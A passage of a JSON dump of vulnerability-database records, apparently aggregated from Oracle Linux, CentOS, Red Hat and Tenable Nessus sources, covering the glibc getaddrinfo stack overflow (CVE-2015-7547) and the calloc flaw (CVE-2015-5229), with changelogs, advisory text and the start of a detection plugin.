implementations using sse4.2 instructions.\n- Upstream commits 584b18eb4df61ccd447db2dfe8c8a7901f8c8598 and\n 1818483b15d22016b0eae41d37ee91cc87b37510 backported.\n[2.17-106.4]\n- Revert problematic libresolv change, not needed for the\n CVE-2015-7547 fix (#1296030).\n[2.17-106.3]\n- Fix CVE-2015-7547: getaddrinfo() stack-based buffer overflow (#1296030).\n- Fix madvise performance issues (#1298930).\n- Avoid 'monstartup: out of memory' error on powerpc64le (#1298956).\n[2.17-106.2]\n- Fix CVE-2015-5229: calloc() may return non-zero memory (#1296453).", "edition": 4, "modified": "2016-02-16T00:00:00", "published": "2016-02-16T00:00:00", "id": "ELSA-2016-0176", "href": "http://linux.oracle.com/errata/ELSA-2016-0176.html", "title": "glibc security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:44", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "description": "[2.17-106.0.1.4]\n- Remove strstr and strcasestr implementations using sse4.2 instructions.\n- Upstream commits 584b18eb4df61ccd447db2dfe8c8a7901f8c8598 and\n 1818483b15d22016b0eae41d37ee91cc87b37510 backported.\n[2.17-106.4]\n- Revert problematic libresolv change, not needed for the\n CVE-2015-7547 fix (#1296030).\n[2.17-106.3]\n- Fix CVE-2015-7547: getaddrinfo() stack-based buffer overflow (#1296030).\n- Fix madvise performance issues (#1298930).\n- Avoid 'monstartup: out of memory' error on powerpc64le (#1298956).\n[2.17-106.2]\n- Fix CVE-2015-5229: calloc() may return non-zero memory (#1296453).", "edition": 4, "modified": "2016-02-16T00:00:00", "published": "2016-02-16T00:00:00", "id": "ELSA-2016-3515", "href": "http://linux.oracle.com/errata/ELSA-2016-3515.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:03", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3075", "CVE-2015-5229", "CVE-2015-7547"], "description": "[2.17-157]\n- Rebuild with updated binutils (#1268008)\n[2.17-156]\n- malloc arena free free list management fix (#1276753)\n[2.17-155]\n- Basic validity check for locale-archive.tmpl (#1350733)\n[2.17-153]\n- Add Intel AVX-512 optimized routines (#1298526).\n[2.17-151]\n- Improve malloc peformance in low-memory situations (#1255822).\n[2.17-150]\n- Improve performance on Intel Knights Landing/Silvermont (#1292018).\n[2.17-149]\n- Improve performance on Intel Purley (#1335286).\n[2.17-148]\n- Support upstream build infrastrucutre changes (#1256317).\n[2.17-147]\n- CVE-2016-3075: Stack overflow in nss_dns_getnetbyname_r (#1321993)\n[2.17-146]\n- s390: Restore signal mask on setcontext/swapcontext (#1249114).\n- s390: Fix backtrace in the presence of makecontext (#1249115).\n[2.17-145]\n- Fix times() handling of EFAULT when buf is NULL (#1308728).\n[2.17-144]\n- Fix sem_post/sem_wait race causing sem_post to return EINVAL (#1027348).\n[2.17-143]\n- Support installing only those locales specified by the RPM macro\n %_install_langs (#1296297).\n[2.17-142]\n- Fix Linux kernel UAPI header synchronization for IPv6 (#1268050).\n[2.17-141]\n- Update BIG5-HKSCS charmap to HKSCS-2008 (#1211823)\n[2.17-140]\n- Remove printf from signal handler in tst-longjump_chk2 (#1346397)\n[2.17-139]\n- Improve libm performance AArch64 (#1302086)\n[2.17-138]\n- Search locale archive again after alias expansion (#971416)\n[2.17-137]\n- Revert IPv6 name server management changes (#1305132)\n[2.17-136]\n- aarch64: Fix bits/stat.h FTM guards (#1221046)\n[2.17-135]\n- aarch64: Fix various minor ABI incompatibilities (#1335925)\n[2.17-134]\n- aarch64: Correct definition of MINSIGSTKSZ/SIGSTKSZ (#1335629)\n[2.17-133]\n- Require libselinux for nscd in non-bootstrap configuration (#1255847).\n[2.17-132]\n- Fix a number of long-standing issues in the TZ parser (#1234449).\n[2.17-131]\n- Remove PER_THREAD preprocessor macro from malloc\n- Use final upstream patch for arena free list fix (#1276753)\n[2.17-130]\n- Prevent the compiler from clobbering floating point and vector\n registers in S390 symbol resolution functions (#1324427).\n- Improve posix_fallocate behavior with NFS file descriptors (#1140250).\n[2.17-129]\n- Remove a race condition from tst-mqueue5.c test to prevent spurious\n failures (#1064063).\n[2.17-128]\n- Prevent a deadlock in gethostbyname_r (#1288613).\n[2.17-127]\n- Use test-skeleton.c in tests (#1298354).\n[2.17-126]\n- Fix inconsistent passwd compensation in nss/bug17079.c (#1293433).\n[2.17-125]\n- Backport tst-getpw enhancement to limit the time the test takes up\n (#1298349).\n[2.17-124]\n- Log system information during build (#1307028).\n[2.17-123]\n- Avoid appending duplicate shift sequences in iconv (#1293916).\n[2.17-122]\n- Reorganize POWER7 and POWER8 support (#1213267).\n - Only build POWER7 runtime for ppc64p7.\n - Only build POWER8 runtime for ppc64le.\n - Configure with --with-cpu=power8 for ppc64le.\n - Configure with --with-cpu=power8 for ppc.\n - Configure with --with-cpu=power7 for ppc64 default runtime.\n[2.17-121]\n- Build require gcc-c++ for the C++ tests.\n- Add --with/--without controls for building glibc (#1255847)\n - Support --without testsuite option to disable testing after build.\n - Support --without benchtests option to disable microbenchmarks\n (placeholder for upstream compatibility only)\n - Update --with bootstrap to disable valgrind, documentation,\n selinux, and nss-crypt during bootstrap.\n - Support --without werror to disable building with -Werror.\n - Support --without docs to disable build requirement on texinfo.\n - Support --with valgrind to enable testing with valgrind.\n[2.17-120]\n- Make minor compatibility adjustments in headers (#1268050).\n[2.17-119]\n- Avoid aliasing issue in tst-rec-dlopen (#1292224)\n[2.17-118]\n- Suppress expected backtrace in tst-malloc-backtrace (#1276631).\n[2.17-117]\n- Avoid ld.so crash when audit modules provide path (#1211100)\n[2.17-116]\n- Avoid 'monstartup: out of memory' error on powerpc64le (#1249102).\n[2.17-115]\n- Configure --with-cpu=power8 on powerpc64 to generate POWER8\n instructions for POWER8 runtime (#1183088, #1213267).\n[2.17-114]\n- Add enhanced and optimized support for IBM z13 systems (#1268008).\n[2.17-113]\n- Prevent the malloc arena free list form turning cyclic (#1276753).\n[2.17-112]\n- Backported POWER8 optimizations for math and string functions (#1240351).\n[2.17-111]\n- Fix NULL pointer dereference in stub resolver with unconnectable name\n server addresses (#1320596).\n[2.17-110]\n- Fix memory leak in ftell for wide-oriented streams (#1310530).\n[2.17-109]\n- Avoid race condition in _int_free involving fastbins (#1305406).\n[2.17-108]\n- Fix CVE-2015-7547: getaddrinfo() stack-based buffer overflow (#1296031).\n- Fix madvise performance issues (#1284959).\n- Avoid 'monstartup: out of memory' error on powerpc64le (#1249102).\n- Update malloc testing for 32-bit POWER (#1293976).\n[2.17-107]\n- Fix CVE-2015-5229: calloc() may return non-zero memory (#1293976).", "edition": 4, "modified": "2016-11-09T00:00:00", "published": "2016-11-09T00:00:00", "id": "ELSA-2016-3638", "href": "http://linux.oracle.com/errata/ELSA-2016-3638.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:54", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3075", "CVE-2015-5229", "CVE-2015-7547"], "description": "[2.17-157]\n- Rebuild with updated binutils (#1268008)\n[2.17-156]\n- malloc arena free free list management fix (#1276753)\n[2.17-155]\n- Basic validity check for locale-archive.tmpl (#1350733)\n[2.17-153]\n- Add Intel AVX-512 optimized routines (#1298526).\n[2.17-151]\n- Improve malloc peformance in low-memory situations (#1255822).\n[2.17-150]\n- Improve performance on Intel Knights Landing/Silvermont (#1292018).\n[2.17-149]\n- Improve performance on Intel Purley (#1335286).\n[2.17-148]\n- Support upstream build infrastrucutre changes (#1256317).\n[2.17-147]\n- CVE-2016-3075: Stack overflow in nss_dns_getnetbyname_r (#1321993)\n[2.17-146]\n- s390: Restore signal mask on setcontext/swapcontext (#1249114).\n- s390: Fix backtrace in the presence of makecontext (#1249115).\n[2.17-145]\n- Fix times() handling of EFAULT when buf is NULL (#1308728).\n[2.17-144]\n- Fix sem_post/sem_wait race causing sem_post to return EINVAL (#1027348).\n[2.17-143]\n- Support installing only those locales specified by the RPM macro\n %_install_langs (#1296297).\n[2.17-142]\n- Fix Linux kernel UAPI header synchronization for IPv6 (#1268050).\n[2.17-141]\n- Update BIG5-HKSCS charmap to HKSCS-2008 (#1211823)\n[2.17-140]\n- Remove printf from signal handler in tst-longjump_chk2 (#1346397)\n[2.17-139]\n- Improve libm performance AArch64 (#1302086)\n[2.17-138]\n- Search locale archive again after alias expansion (#971416)\n[2.17-137]\n- Revert IPv6 name server management changes (#1305132)\n[2.17-136]\n- aarch64: Fix bits/stat.h FTM guards (#1221046)\n[2.17-135]\n- aarch64: Fix various minor ABI incompatibilities (#1335925)\n[2.17-134]\n- aarch64: Correct definition of MINSIGSTKSZ/SIGSTKSZ (#1335629)\n[2.17-133]\n- Require libselinux for nscd in non-bootstrap configuration (#1255847).\n[2.17-132]\n- Fix a number of long-standing issues in the TZ parser (#1234449).\n[2.17-131]\n- Remove PER_THREAD preprocessor macro from malloc\n- Use final upstream patch for arena free list fix (#1276753)\n[2.17-130]\n- Prevent the compiler from clobbering floating point and vector\n registers in S390 symbol resolution functions (#1324427).\n- Improve posix_fallocate behavior with NFS file descriptors (#1140250).\n[2.17-129]\n- Remove a race condition from tst-mqueue5.c test to prevent spurious\n failures (#1064063).\n[2.17-128]\n- Prevent a deadlock in gethostbyname_r (#1288613).\n[2.17-127]\n- Use test-skeleton.c in tests (#1298354).\n[2.17-126]\n- Fix inconsistent passwd compensation in nss/bug17079.c (#1293433).\n[2.17-125]\n- Backport tst-getpw enhancement to limit the time the test takes up\n (#1298349).\n[2.17-124]\n- Log system information during build (#1307028).\n[2.17-123]\n- Avoid appending duplicate shift sequences in iconv (#1293916).\n[2.17-122]\n- Reorganize POWER7 and POWER8 support (#1213267).\n - Only build POWER7 runtime for ppc64p7.\n - Only build POWER8 runtime for ppc64le.\n - Configure with --with-cpu=power8 for ppc64le.\n - Configure with --with-cpu=power8 for ppc.\n - Configure with --with-cpu=power7 for ppc64 default runtime.\n[2.17-121]\n- Build require gcc-c++ for the C++ tests.\n- Add --with/--without controls for building glibc (#1255847)\n - Support --without testsuite option to disable testing after build.\n - Support --without benchtests option to disable microbenchmarks\n (placeholder for upstream compatibility only)\n - Update --with bootstrap to disable valgrind, documentation,\n selinux, and nss-crypt during bootstrap.\n - Support --without werror to disable building with -Werror.\n - Support --without docs to disable build requirement on texinfo.\n - Support --with valgrind to enable testing with valgrind.\n[2.17-120]\n- Make minor compatibility adjustments in headers (#1268050).\n[2.17-119]\n- Avoid aliasing issue in tst-rec-dlopen (#1292224)\n[2.17-118]\n- Suppress expected backtrace in tst-malloc-backtrace (#1276631).\n[2.17-117]\n- Avoid ld.so crash when audit modules provide path (#1211100)\n[2.17-116]\n- Avoid 'monstartup: out of memory' error on powerpc64le (#1249102).\n[2.17-115]\n- Configure --with-cpu=power8 on powerpc64 to generate POWER8\n instructions for POWER8 runtime (#1183088, #1213267).\n[2.17-114]\n- Add enhanced and optimized support for IBM z13 systems (#1268008).\n[2.17-113]\n- Prevent the malloc arena free list form turning cyclic (#1276753).\n[2.17-112]\n- Backported POWER8 optimizations for math and string functions (#1240351).\n[2.17-111]\n- Fix NULL pointer dereference in stub resolver with unconnectable name\n server addresses (#1320596).\n[2.17-110]\n- Fix memory leak in ftell for wide-oriented streams (#1310530).\n[2.17-109]\n- Avoid race condition in _int_free involving fastbins (#1305406).\n[2.17-108]\n- Fix CVE-2015-7547: getaddrinfo() stack-based buffer overflow (#1296031).\n- Fix madvise performance issues (#1284959).\n- Avoid 'monstartup: out of memory' error on powerpc64le (#1249102).\n- Update malloc testing for 32-bit POWER (#1293976).\n[2.17-107]\n- Fix CVE-2015-5229: calloc() may return non-zero memory (#1293976).", "edition": 4, "modified": "2016-11-09T00:00:00", "published": "2016-11-09T00:00:00", "id": "ELSA-2016-2573", "href": "http://linux.oracle.com/errata/ELSA-2016-2573.html", "title": "glibc security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "[2.12-1.166.7]\n- Update fix for CVE-2015-7547 (#1296028).\n[2.12-1.166.6]\n- Create helper threads with enough stack for POSIX AIO and timers (#1301625).\n[2.12-1.166.5]\n- Fix CVE-2015-7547: getaddrinfo() stack-based buffer overflow (#1296028).\n[2.12-1.166.4]\n- Support loading more libraries with static TLS (#1291270).", "edition": 4, "modified": "2016-02-16T00:00:00", "published": "2016-02-16T00:00:00", "id": "ELSA-2016-0175", "href": "http://linux.oracle.com/errata/ELSA-2016-0175.html", "title": "glibc security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:37", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "[2.12-1.166.7]\n- Update fix for CVE-2015-7547 (#1296028).\n[2.12-1.166.6]\n- Create helper threads with enough stack for POSIX AIO and timers (#1301625).\n[2.12-1.166.5]\n- Fix CVE-2015-7547: getaddrinfo() stack-based buffer overflow (#1296028).\n[2.12-1.166.4]\n- Support loading more libraries with static TLS (#1291270).", "edition": 4, "modified": "2016-02-16T00:00:00", "published": "2016-02-16T00:00:00", "id": "ELSA-2016-3516", "href": "http://linux.oracle.com/errata/ELSA-2016-3516.html", "title": "glibc security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:28:50", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "description": "**CentOS Errata and Security Advisory** CESA-2016:0176\n\n\nThe glibc packages provide the standard C libraries (libc), POSIX \nthread libraries (libpthread), standard math libraries (libm), and the \nname service cache daemon (nscd) used by multiple programs on the \nsystem. Without these libraries, the Linux system cannot function \ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in unexpected\napplication behavior such as hangs or crashes. (CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and Red\nHat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs:\n\n* The existing implementation of the \"free\" function causes all memory\npools beyond the first to return freed memory directly to the operating\nsystem as quickly as possible. This can result in performance degradation\nwhen the rate of free calls is very high. The first memory pool (the main\npool) does provide a method to rate limit the returns via M_TRIM_THRESHOLD,\nbut this method is not available to subsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to all\nmemory pools, which improves performance for threads with very high amounts\nof free calls and limits the number of \"madvise\" system calls. The change\nalso increases the total transient memory usage by processes because the\ntrim threshold must be reached before memory can be freed.\n\nTo return to the previous behavior, you can either set M_TRIM_THRESHOLD\nusing the \"mallopt\" function, or set the MALLOC_TRIM_THRESHOLD environment\nvariable to 0. (BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le), a bug\nin the dynamic loader could cause applications compiled with profiling\nenabled to fail to start with the error \"monstartup: out of memory\".\nThe bug has been corrected and applications compiled for profiling now\nstart correctly. (BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-February/033710.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-0176.html", "edition": 3, "modified": "2016-02-17T01:37:20", "published": "2016-02-17T01:37:20", "href": "http://lists.centos.org/pipermail/centos-announce/2016-February/033710.html", "id": "CESA-2016:0176", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:28:33", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "**CentOS Errata and Security Advisory** CESA-2016:0175\n\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs:\n\n* The dynamic loader has been enhanced to allow the loading of more shared\nlibraries that make use of static thread local storage. While static thread\nlocal storage is the fastest access mechanism it may also prevent the\nshared library from being loaded at all since the static storage space is a\nlimited and shared process-global resource. Applications which would\npreviously fail with \"dlopen: cannot load any more object with static TLS\"\nshould now start up correctly. (BZ#1291270)\n\n* A bug in the POSIX realtime support would cause asynchronous I/O or\ncertain timer API calls to fail and return errors in the presence of large\nthread-local storage data that exceeded PTHREAD_STACK_MIN in size\n(generally 16 KiB). The bug in librt has been corrected and the impacted\nAPIs no longer return errors when large thread-local storage data is\npresent in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-February/033706.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-0175.html", "edition": 3, "modified": "2016-02-17T00:39:19", "published": "2016-02-17T00:39:19", "href": "http://lists.centos.org/pipermail/centos-announce/2016-February/033706.html", "id": "CESA-2016:0175", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:59", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "description": "The glibc packages provide the standard C libraries (libc), POSIX \nthread libraries (libpthread), standard math libraries (libm), and the \nname service cache daemon (nscd) used by multiple programs on the \nsystem. Without these libraries, the Linux system cannot function \ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in unexpected\napplication behavior such as hangs or crashes. (CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and Red\nHat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs:\n\n* The existing implementation of the \"free\" function causes all memory\npools beyond the first to return freed memory directly to the operating\nsystem as quickly as possible. This can result in performance degradation\nwhen the rate of free calls is very high. The first memory pool (the main\npool) does provide a method to rate limit the returns via M_TRIM_THRESHOLD,\nbut this method is not available to subsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to all\nmemory pools, which improves performance for threads with very high amounts\nof free calls and limits the number of \"madvise\" system calls. The change\nalso increases the total transient memory usage by processes because the\ntrim threshold must be reached before memory can be freed.\n\nTo return to the previous behavior, you can either set M_TRIM_THRESHOLD\nusing the \"mallopt\" function, or set the MALLOC_TRIM_THRESHOLD environment\nvariable to 0. (BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le), a bug\nin the dynamic loader could cause applications compiled with profiling\nenabled to fail to start with the error \"monstartup: out of memory\".\nThe bug has been corrected and applications compiled for profiling now\nstart correctly. (BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.", "modified": "2018-04-12T03:33:28", "published": "2016-02-16T20:05:53", "id": "RHSA-2016:0176", "href": "https://access.redhat.com/errata/RHSA-2016:0176", "type": "redhat", "title": "(RHSA-2016:0176) Critical: glibc security and bug fix update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:39", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2016-09-04T02:18:39", "published": "2016-02-16T05:00:00", "id": "RHSA-2016:0225", "href": "https://access.redhat.com/errata/RHSA-2016:0225", "type": "redhat", "title": "(RHSA-2016:0225) Critical: glibc security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:14", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs:\n\n* The dynamic loader has been enhanced to allow the loading of more shared\nlibraries that make use of static thread local storage. While static thread\nlocal storage is the fastest access mechanism it may also prevent the\nshared library from being loaded at all since the static storage space is a\nlimited and shared process-global resource. Applications which would\npreviously fail with \"dlopen: cannot load any more object with static TLS\"\nshould now start up correctly. (BZ#1291270)\n\n* A bug in the POSIX realtime support would cause asynchronous I/O or\ncertain timer API calls to fail and return errors in the presence of large\nthread-local storage data that exceeded PTHREAD_STACK_MIN in size\n(generally 16 KiB). The bug in librt has been corrected and the impacted\nAPIs no longer return errors when large thread-local storage data is\npresent in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\n", "modified": "2018-06-06T20:24:16", "published": "2016-02-16T05:00:00", "id": "RHSA-2016:0175", "href": "https://access.redhat.com/errata/RHSA-2016:0175", "type": "redhat", "title": "(RHSA-2016:0175) Critical: glibc security and bug fix update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:57", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "The rhev-hypervisor package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nUsers of Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to these updated packages.\n", "modified": "2018-06-07T08:59:30", "published": "2016-02-19T05:00:00", "id": "RHSA-2016:0277", "href": "https://access.redhat.com/errata/RHSA-2016:0277", "type": "redhat", "title": "(RHSA-2016:0277) Critical: rhev-hypervisor security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-17T13:49:08", "description": "A stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThis update also fixes the following bugs :\n\n - The existing implementation of the 'free' function\n causes all memory pools beyond the first to return freed\n memory directly to the operating system as quickly as\n possible. This can result in performance degradation\n when the rate of free calls is very high. The first\n memory pool (the main pool) does provide a method to\n rate limit the returns via M_TRIM_THRESHOLD, but this\n method is not available to subsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0.\n\n - On the little-endian variant of 64-bit IBM Power Systems\n (ppc64le), a bug in the dynamic loader could cause\n applications compiled with profiling enabled to fail to\n start with the error 'monstartup: out of memory'. The\n bug has been corrected and applications compiled for\n profiling now start correctly.", "edition": 20, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "title": "Scientific Linux Security Update : glibc on SL7.x x86_64 (20160216)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "modified": "2016-02-17T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-static", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:nscd", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:glibc-headers"], "id": "SL_20160216_GLIBC_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/88798", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88798);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5229\", \"CVE-2015-7547\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL7.x x86_64 (20160216)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThis update also fixes the following bugs :\n\n - The existing implementation of the 'free' function\n causes all memory pools beyond the first to return freed\n memory directly to the operating system as quickly as\n possible. This can result in performance degradation\n when the rate of free calls is very high. The first\n memory pool (the main pool) does provide a method to\n rate limit the returns via M_TRIM_THRESHOLD, but this\n method is not available to subsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0.\n\n - On the little-endian variant of 64-bit IBM Power Systems\n (ppc64le), a bug in the dynamic loader could cause\n applications compiled with profiling enabled to fail to\n start with the error 